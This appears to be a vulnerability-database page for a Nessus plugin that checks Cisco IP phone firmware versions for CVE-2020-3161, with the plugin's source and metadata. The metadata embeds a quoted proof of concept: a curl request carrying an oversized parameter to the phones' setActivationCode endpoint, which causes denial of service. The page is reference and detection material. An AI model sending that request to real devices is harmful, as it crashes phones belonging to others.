Search...

Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)

2020-10-06T00:00:00

ID CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS.NASL
Type nessus
Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2020-10-06T00:00:00

Description

A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due to a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.

Please see the included Cisco BIDs and Cisco Security Advisory for more information.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(141192);
  script_version("1.2");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/07");

  script_cve_id("CVE-2020-3161");
  script_xref(name:"CISCO-BUG-ID", value:"CSCuz03016");
  script_xref(name:"CISCO-BUG-ID", value:"CSCvs78272");
  script_xref(name:"CISCO-BUG-ID", value:"CSCvs78441");
  script_xref(name:"CISCO-SA", value:"cisco-sa-voip-phones-rce-dos-rB6EeRXs");

  script_name(english:"Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)");

  script_set_attribute(attribute:"synopsis", value:
"The remote IP phone has multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due 
to a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this 
vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit 
could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, 
resulting in a DoS condition.

Please see the included Cisco BIDs and Cisco Security Advisory for more information.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f2eef1cf");
  script_set_attribute(attribute:"solution", value:
"Apply the fix referenced in the vendor's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-3161");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20);

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/04/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/04/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/06");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/h:cisco:ip_phone");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/o:cisco:ip_phone");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cisco_ip_phone_sip_detect.nbin");
  script_require_keys("installed_sw/Cisco IP Phone");
  script_require_ports("Services/sip", "Services/udp/sip");

  exit(0);
}

include('vcf.inc');
include('vcf_extras.inc');

app = 'Cisco IP Phone';

detected_on = get_kb_list('installed_sw/*/Cisco IP Phone/service/*/SIP/Banner');

report = '';

foreach item(keys(detected_on))
{
  portproto = pregmatch(string:item, pattern:'installed_sw/([0-9]+)/Cisco IP Phone/service/([a-z]{3})/SIP/Banner');
  if (!empty_or_null(portproto))
  {
    port = portproto[1];
    proto = portproto[2];
    app_info = vcf::cisco_ip_phone::get_app_info(app:app, port:port, proto:proto);

    mod = app_info['model'];

    #  IP Phone 7811, 7821, 7841, 7861 Desktop Phones	
    #  IP Phone 8811, 8841, 8845, 8851, 8861, 8865 Desktop Phones
    models = {
      '7811'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7821'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7841'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '7861'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8811'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8841'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8845'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8851'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8861'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8865'      : { 'constraints': [{'fixed_version' : '11.7.1',  'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},
      '8821'      : { 'constraints': [{'fixed_version' : '11.0(5)SR3',  'fixed_display' : '11.0(5)SR3, Refer to Cisco Bug ID: CSCvs78272'}]},
      '8831'      : { 'constraints': [{'fixed_version' : '10.3(1)SR6',  'fixed_display' : '10.3(1)SR6, Refer to Cisco Bug ID: CSCvs78441'}]}
    };

    report += vcf::cisco_ip_phone::check_version(app_info:app_info, constraints:models[app_info.model]['constraints']);
  }
}

if (empty_or_null(report))
  audit(AUDIT_HOST_NOT, 'affected');

security_report_v4(port:port, proto:proto, severity:SECURITY_HOLE, extra:report);

JSON Vulners Source

Initial Source

{"id": "CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS.NASL", "bulletinFamily": "scanner", "title": "Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)", "description": "A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due \nto a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this \nvulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit \ncould allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, \nresulting in a DoS condition.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "published": "2020-10-06T00:00:00", "modified": "2020-10-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/141192", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?f2eef1cf"], "cvelist": ["CVE-2020-3161"], "type": "nessus", "lastseen": "2020-10-08T05:23:18", "edition": 2, "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-3161"]}, {"type": "zdt", "idList": ["1337DAY-ID-34255"]}, {"type": "exploitdb", "idList": ["EDB-ID:48342"]}, {"type": "cisco", "idList": ["CISCO-SA-VOIP-PHONES-RCE-DOS-RB6EERXS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157265"]}, {"type": "threatpost", "idList": ["THREATPOST:F2B495A97075920EEF1C7328AE80CC7B"]}], "modified": "2020-10-08T05:23:18", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-10-08T05:23:18", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141192);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/07\");\n\n script_cve_id(\"CVE-2020-3161\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuz03016\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs78272\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs78441\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-voip-phones-rce-dos-rB6EeRXs\");\n\n script_name(english:\"Cisco IP Phones Web Server RCE and DOS (cisco-sa-voip-phones-rce-dos-rB6EeRXs)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IP phone has multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability and remote code execution (RCE) exists in Cisco IP Phones due \nto a lack of proper input validation of HTTP requests. An unauthenticated attacker can exploit this \nvulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit \ncould allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, \nresulting in a DoS condition.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f2eef1cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the fix referenced in the vendor's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/h:cisco:ip_phone\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:ip_phone\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ip_phone_sip_detect.nbin\");\n script_require_keys(\"installed_sw/Cisco IP Phone\");\n script_require_ports(\"Services/sip\", \"Services/udp/sip\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Cisco IP Phone';\n\ndetected_on = get_kb_list('installed_sw/*/Cisco IP Phone/service/*/SIP/Banner');\n\nreport = '';\n\nforeach item(keys(detected_on))\n{\n portproto = pregmatch(string:item, pattern:'installed_sw/([0-9]+)/Cisco IP Phone/service/([a-z]{3})/SIP/Banner');\n if (!empty_or_null(portproto))\n {\n port = portproto[1];\n proto = portproto[2];\n app_info = vcf::cisco_ip_phone::get_app_info(app:app, port:port, proto:proto);\n\n mod = app_info['model'];\n\n # IP Phone 7811, 7821, 7841, 7861 Desktop Phones\t\n # IP Phone 8811, 8841, 8845, 8851, 8861, 8865 Desktop Phones\n models = {\n '7811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7821' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '7861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8811' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8841' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8845' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8851' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8861' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8865' : { 'constraints': [{'fixed_version' : '11.7.1', 'fixed_display' : '11.7.1, Refer to Cisco Bug ID: CSCuz03016'}]},\n '8821' : { 'constraints': [{'fixed_version' : '11.0(5)SR3', 'fixed_display' : '11.0(5)SR3, Refer to Cisco Bug ID: CSCvs78272'}]},\n '8831' : { 'constraints': [{'fixed_version' : '10.3(1)SR6', 'fixed_display' : '10.3(1)SR6, Refer to Cisco Bug ID: CSCvs78441'}]}\n };\n\n report += vcf::cisco_ip_phone::check_version(app_info:app_info, constraints:models[app_info.model]['constraints']);\n }\n}\n\nif (empty_or_null(report))\n audit(AUDIT_HOST_NOT, 'affected');\n\nsecurity_report_v4(port:port, proto:proto, severity:SECURITY_HOLE, extra:report);\n", "naslFamily": "CISCO", "pluginID": "141192", "cpe": ["x-cpe:/h:cisco:ip_phone", "x-cpe:/o:cisco:ip_phone"], "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:55:53", "description": "A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T20:15:00", "title": "CVE-2020-3161", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3161"], "modified": "2020-04-28T16:26:00", "cpe": ["cpe:/o:cisco:ip_phone_8865_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8851_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8861_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8811_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8821_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8841_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8861_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8865_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8845_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8821-ex_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8845_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821-ex_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8811_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7861_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8845_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8841_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8851_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8851_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8821-ex_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_7821_firmware:11.0\\(1\\)", "cpe:/o:cisco:8831_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:8831_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7841_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8841_firmware:11.0\\(5\\)sr1", "cpe:/o:cisco:ip_phone_8861_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_7811_firmware:11.0\\(1\\)", "cpe:/o:cisco:ip_phone_8865_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8821_firmware:11.0\\(1\\)", "cpe:/o:cisco:8831_firmware:10.3\\(1\\)es14", "cpe:/o:cisco:ip_phone_8811_firmware:10.3\\(1\\)es14"], "id": "CVE-2020-3161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3161", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7861_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8865_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7841_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7811_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_7821_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8821-ex_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8811_firmware:10.3\\(1\\)es14:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ip_phone_8841_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:8831_firmware:11.0\\(5\\)sr1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2020-07-19T20:02:06", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2020-04-18T00:00:00", "title": "Cisco IP Phone 11.7 - Denial of service Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-18T00:00:00", "id": "1337DAY-ID-34255", "href": "https://0day.today/exploit/description/34255", "sourceData": "# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)\r\n# Date: 2020-04-15\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://www.cisco.com\r\n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html\r\n# Version: Before 11.7(1)\r\n# Tested on: Cisco Wireless IP Phone 8821\r\n# CVE: CVE-2020-3161\r\n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs\r\n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24\r\n\r\ncurl -v --path-as-is --insecure\r\nhttps://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34255"}], "packetstorm": [{"lastseen": "2020-04-20T07:51:59", "description": "", "published": "2020-04-17T00:00:00", "type": "packetstorm", "title": "Cisco IP Phone 11.7 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3161"], "modified": "2020-04-17T00:00:00", "id": "PACKETSTORM:157265", "href": "https://packetstormsecurity.com/files/157265/Cisco-IP-Phone-11.7-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC) \n# Date: 2020-04-15 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: https://www.cisco.com \n# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html \n# Version: Before 11.7(1) \n# Tested on: Cisco Wireless IP Phone 8821 \n# CVE: CVE-2020-3161 \n# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs \n# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 \n \ncurl -v --path-as-is --insecure 